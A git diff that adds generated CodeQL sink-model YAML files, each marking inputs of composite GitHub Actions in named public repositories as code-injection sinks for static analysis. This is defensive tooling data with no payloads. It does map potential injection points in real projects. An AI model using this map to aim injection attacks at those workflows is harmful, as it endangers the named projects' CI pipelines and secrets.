a/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml b/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml new file mode 100644 index 000000000000..95164c659ed5 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["esphome/esphome", "*", "inputs.target", "code-injection", "generated"] + - ["esphome/esphome", "*", "inputs.suffix", "code-injection", "generated"] + - ["esphome/esphome", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/expensify_app.model.yml b/ql/lib/ext/generated/composite-actions/expensify_app.model.yml new file mode 100644 index 000000000000..7e3b5e4caf60 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/expensify_app.model.yml @@ -0,0 +1,14 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["expensify/app", "*", "inputs.GPG_PASSPHRASE", "code-injection", "generated"] + - ["expensify/app", "*", "inputs.PACKAGE_SCRIPT_NAME", "code-injection", "generated"] + - ["expensify/app", "*", "inputs.EXPENSIFY_PARTNER_PASSWORD_EMAIL", "code-injection", "generated"] + - ["expensify/app", "*", "inputs.EXPENSIFY_PARTNER_USER_SECRET", "code-injection", "generated"] + - ["expensify/app", "*", "inputs.EXPENSIFY_PARTNER_USER_ID", "code-injection", "generated"] + - ["expensify/app", "*", "inputs.EXPENSIFY_PARTNER_PASSWORD", "code-injection", "generated"] + - ["expensify/app", "*", "inputs.PATH_ENV_FILE", "code-injection", "generated"] + - ["expensify/app", "*", "inputs.EXPENSIFY_PARTNER_NAME", "code-injection", "generated"] + - ["expensify/app", "*", "inputs.MAPBOX_SDK_DOWNLOAD_TOKEN", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/expo_expo.model.yml b/ql/lib/ext/generated/composite-actions/expo_expo.model.yml new file mode 100644 index 000000000000..f335170dc854 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/expo_expo.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["expo/expo", "*", "inputs.ndk-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml b/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml new file mode 100644 index 000000000000..555fa42a79cc --- /dev/null 
+++ b/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["expo/vscode-expo", "*", "inputs.command", "code-injection", "generated"] + - ["expo/vscode-expo", "*", "inputs.semver", "code-injection", "generated"] + - ["expo/vscode-expo", "*", "inputs.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml b/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml new file mode 100644 index 000000000000..8fd9440729f6 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["external-secrets/external-secrets", "*", "inputs.image-tag", "code-injection", "generated"] + - ["external-secrets/external-secrets", "*", "inputs.image-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml b/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml new file mode 100644 index 000000000000..f9479e11aabf --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["facebook/buck2", "*", "inputs.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml b/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml new file mode 100644 index 000000000000..711eabc2bfa5 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml 
@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["facebook/flow", "*", "inputs.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml b/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml new file mode 100644 index 000000000000..745f89d8677b --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["facebook/yoga", "*", "inputs.version", "code-injection", "generated"] + - ["facebook/yoga", "*", "inputs.directory", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml b/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml new file mode 100644 index 000000000000..a732e2fac3f0 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["facebookresearch/xformers", "*", "inputs.arch", "code-injection", "generated"] + - ["facebookresearch/xformers", "*", "inputs.pytorch_channel", "code-injection", "generated"] + - ["facebookresearch/xformers", "*", "inputs.pytorch_version", "code-injection", "generated"] + - ["facebookresearch/xformers", "*", "inputs.python", "code-injection", "generated"] + - ["facebookresearch/xformers", "*", "inputs.cuda", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml b/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml new file mode 100644 index 000000000000..1aebd1199a5a --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml 
@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["fastly/compute-actions", "*", "inputs.fastly-api-token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml b/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml new file mode 100644 index 000000000000..708adf528f29 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["felangel/bloc", "*", "inputs.coverage_excludes", "code-injection", "generated"] + - ["felangel/bloc", "*", "inputs.analyze_directories", "code-injection", "generated"] + - ["felangel/bloc", "*", "inputs.report_on", "code-injection", "generated"] + - ["felangel/bloc", "*", "inputs.concurrency", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml b/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml new file mode 100644 index 000000000000..18c02da44431 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["firebase/firebase-ios-sdk", "*", "inputs.min-ios-version", "code-injection", "generated"] + - ["firebase/firebase-ios-sdk", "*", "inputs.sources", "code-injection", "generated"] + - ["firebase/firebase-ios-sdk", "*", "inputs.pods", "code-injection", "generated"] + - ["firebase/firebase-ios-sdk", "*", "inputs.notices-path", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml b/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml new file mode 100644 index 000000000000..c0a44fae7498 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["flaxengine/flaxengine", "*", "inputs.vulkan-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml b/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml new file mode 100644 index 000000000000..af0f474bfaef --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["flipperdevices/flipperzero-firmware", "*", "inputs.firmware-version", "code-injection", "generated"] + - ["flipperdevices/flipperzero-firmware", "*", "inputs.firmware-target", "code-injection", "generated"] + - ["flipperdevices/flipperzero-firmware", "*", "inputs.firmware-api", "code-injection", "generated"] + - ["flipperdevices/flipperzero-firmware", "*", "inputs.catalog-api-token", "code-injection", "generated"] + - ["flipperdevices/flipperzero-firmware", "*", "inputs.catalog-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml b/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml new file mode 100644 index 000000000000..731ecd5ab1be --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml 
@@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["fluxcd/flux2", "*", "inputs.bindir", "code-injection", "generated"] + - ["fluxcd/flux2", "*", "inputs.token", "code-injection", "generated"] + - ["fluxcd/flux2", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml b/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml new file mode 100644 index 000000000000..ca4dc84bbfc2 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["forcedotcom/salesforcedx-vscode", "*", "inputs.email", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml b/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml new file mode 100644 index 000000000000..caa6432efa9e --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["fossasia/visdom", "*", "inputs.loadprbuild", "code-injection", "generated"] + - ["fossasia/visdom", "*", "inputs.usebasebranch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml b/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml new file mode 100644 index 000000000000..a2e78841f692 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml 
@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["freckle/stack-action", "*", "inputs.find-options", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml b/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml new file mode 100644 index 000000000000..fbb76ae46e88 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["freeradius/freeradius-server", "*", "inputs.gcc_ver", "code-injection", "generated"] + - ["freeradius/freeradius-server", "*", "inputs.llvm_ver", "code-injection", "generated"] + - ["freeradius/freeradius-server", "*", "inputs.sql_mysql_test_server", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml b/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml new file mode 100644 index 000000000000..23d001db673e --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["gaphor/gaphor", "*", "inputs.version", "code-injection", "generated"] + - ["gaphor/gaphor", "*", "inputs.base64_encoded_pfx", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml b/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml new file mode 100644 index 000000000000..94c7adf250af --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml 
@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["getsentry/action-release", "*", "inputs.working_directory", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml b/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml new file mode 100644 index 000000000000..85632a06a75b --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["github/codeql-action", "*", "inputs.latest_tag", "code-injection", "generated"] + - ["github/codeql-action", "*", "inputs.major_version", "code-injection", "generated"] + - ["github/codeql-action", "*", "inputs.version", "code-injection", "generated"] + - ["github/codeql-action", "*", "inputs.use-all-platform-bundle", "code-injection", "generated"] + - ["github/codeql-action", "*", "inputs.expected-config-file-contents", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/github_ruby.model.yml b/ql/lib/ext/generated/composite-actions/github_ruby.model.yml new file mode 100644 index 000000000000..9f002168214b --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/github_ruby.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["github/ruby", "*", "inputs.builddir", "code-injection", "generated"] + - ["github/ruby", "*", "inputs.srcdir", "code-injection", "generated"] + - ["github/ruby", "*", "inputs.test-opts", "code-injection", "generated"] + - ["github/ruby", "*", "inputs.report-path", "code-injection", "generated"] + - ["github/ruby", "*", "inputs.launchable-token", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml b/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml new file mode 100644 index 000000000000..f1191e5c1c6d --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["gittools/gitversion", "*", "inputs.distro", "code-injection", "generated"] + - ["gittools/gitversion", "*", "inputs.targetFramework", "code-injection", "generated"] + - ["gittools/gitversion", "*", "inputs.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml b/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml new file mode 100644 index 000000000000..b0e30669c2ec --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["go-spatial/tegola", "*", "inputs.artifact_name", "code-injection", "generated"] + - ["go-spatial/tegola", "*", "inputs.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml b/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml new file mode 100644 index 000000000000..e26f0a886d91 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["goauthentik/authentik", "*", "inputs.postgresql_version", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml b/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml new file mode 100644 index 000000000000..4b40b2fda8a5 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["godotengine/godot", "*", "inputs.bin", "code-injection", "generated"] + - ["godotengine/godot", "*", "inputs.tests", "code-injection", "generated"] + - ["godotengine/godot", "*", "inputs.target", "code-injection", "generated"] + - ["godotengine/godot", "*", "inputs.platform", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/google_dagger.model.yml b/ql/lib/ext/generated/composite-actions/google_dagger.model.yml new file mode 100644 index 000000000000..06b6e37ea1c7 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/google_dagger.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["google/dagger", "*", "inputs.agp", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml b/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml new file mode 100644 index 000000000000..dab53d9d5a37 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["googleapis/java-cloud-bom", "*", "inputs.bom-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml b/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml new file mode 100644 index 000000000000..ce485e688f25 
--- /dev/null +++ b/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["googleapis/sdk-platform-java", "*", "inputs.bom-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml b/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml new file mode 100644 index 000000000000..82d69349e3ae --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["googlecloudplatform/magic-modules", "*", "inputs.repo", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml b/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml new file mode 100644 index 000000000000..13a6bfe9233a --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["gravitational/teleport", "*", "inputs.target", "code-injection", "generated"] + - ["gravitational/teleport", "*", "inputs.attempts", "code-injection", "generated"] + - ["gravitational/teleport", "*", "inputs.flags", "code-injection", "generated"] + - ["gravitational/teleport", "*", "inputs.path", "code-injection", "generated"] + - ["gravitational/teleport", "*", "inputs.bin", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml b/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml new file mode 100644 index 000000000000..163abb261858 --- /dev/null 
+++ b/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["grote/transportr", "*", "inputs.api-level", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml b/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml new file mode 100644 index 000000000000..3be0de433299 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["hashicorp/nomad", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml b/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml new file mode 100644 index 000000000000..2b0b84e172bf --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["hashicorp/terraform", "*", "inputs.target-terraform-branch", "code-injection", "generated"] + - ["hashicorp/terraform", "*", "inputs.target-terraform-version", "code-injection", "generated"] + - ["hashicorp/terraform", "*", "inputs.target-arch", "code-injection", "generated"] + - ["hashicorp/terraform", "*", "inputs.target-os", "code-injection", "generated"] + - ["hashicorp/terraform", "*", "inputs.target-equivalence-test-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml b/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml new file mode 100644 index 000000000000..bcd6e0eda315 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml 
@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["hashicorp/vault", "*", "inputs.destination", "code-injection", "generated"] + - ["hashicorp/vault", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml b/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml new file mode 100644 index 000000000000..d93b946f3d74 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["home-assistant/android", "*", "inputs.lokalise-token", "code-injection", "generated"] + - ["home-assistant/android", "*", "inputs.lokalise-project", "code-injection", "generated"] + - ["home-assistant/android", "*", "inputs.tag-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml b/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml new file mode 100644 index 000000000000..40adbe1fc29b --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml 
@@ -0,0 +1,14 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["homebrew/actions", "*", "inputs.casks", "code-injection", "generated"] + - ["homebrew/actions", "*", "inputs.formulae", "code-injection", "generated"] + - ["homebrew/actions", "*", "inputs.signing_key", "code-injection", "generated"] + - ["homebrew/actions", "*", "inputs.workflow-name", "code-injection", "generated"] + - ["homebrew/actions", "*", "inputs.collapse", "code-injection", "generated"] + - ["homebrew/actions", "*", "inputs.step_name", "code-injection", "generated"] + - ["homebrew/actions", "*", "inputs.result_path", "code-injection", "generated"] + - ["homebrew/actions", "*", "inputs.workdir", "code-injection", "generated"] + - ["homebrew/actions", "*", "inputs.script", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml b/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml new file mode 100644 index 000000000000..293d8a832bd4 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["hyperledger/aries-cloudagent-python", "*", "inputs.TEST_SCOPE", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml b/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml new file mode 100644 index 000000000000..c72000641cec --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml 
@@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["hyperledger/fabric-samples", "*", "inputs.ca-version", "code-injection", "generated"] + - ["hyperledger/fabric-samples", "*", "inputs.fabric-version", "code-injection", "generated"] + - ["hyperledger/fabric-samples", "*", "inputs.k9s-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml b/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml new file mode 100644 index 000000000000..53929ab8ed1a --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["igniterealtime/openfire", "*", "inputs.domain", "code-injection", "generated"] + - ["igniterealtime/openfire", "*", "inputs.ip", "code-injection", "generated"] + - ["igniterealtime/openfire", "*", "inputs.distBaseDir", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml b/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml new file mode 100644 index 000000000000..1330f370747e --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["infracost/actions", "*", "inputs.behavior", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml b/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml new file mode 100644 index 000000000000..d9d9c6770bc0 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml 
@@ -0,0 +1,18 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["inspektor-gadget/inspektor-gadget", "*", "inputs.runtime", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "inputs.registry", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "inputs.container-image", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "inputs.gadget_tag", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "inputs.gadget_repository", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "inputs.dnstester_image", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "inputs.image_tag", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "inputs.container_repo", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "inputs.kubernetes_architecture", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "inputs.kubernetes_distribution", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "inputs.test-step-conclusion", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "inputs.test-summary-suffix", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "inputs.test-log-file", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml b/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml new file mode 100644 index 000000000000..faf1d7ed5c53 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml 
@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["intel-analytics/ipex-llm", "*", "inputs.extra-dependency", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml b/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml new file mode 100644 index 000000000000..12ae92c149b7 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml @@ -0,0 +1,16 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["ionic-team/ionic-framework", "*", "inputs.totalShards", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "inputs.shard", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "inputs.component", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "inputs.paths", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "inputs.output", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "inputs.app", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "inputs.stencil-version", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "inputs.folder", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "inputs.tag", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "inputs.preid", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml b/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml new file mode 100644 index 000000000000..610016200174 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml 
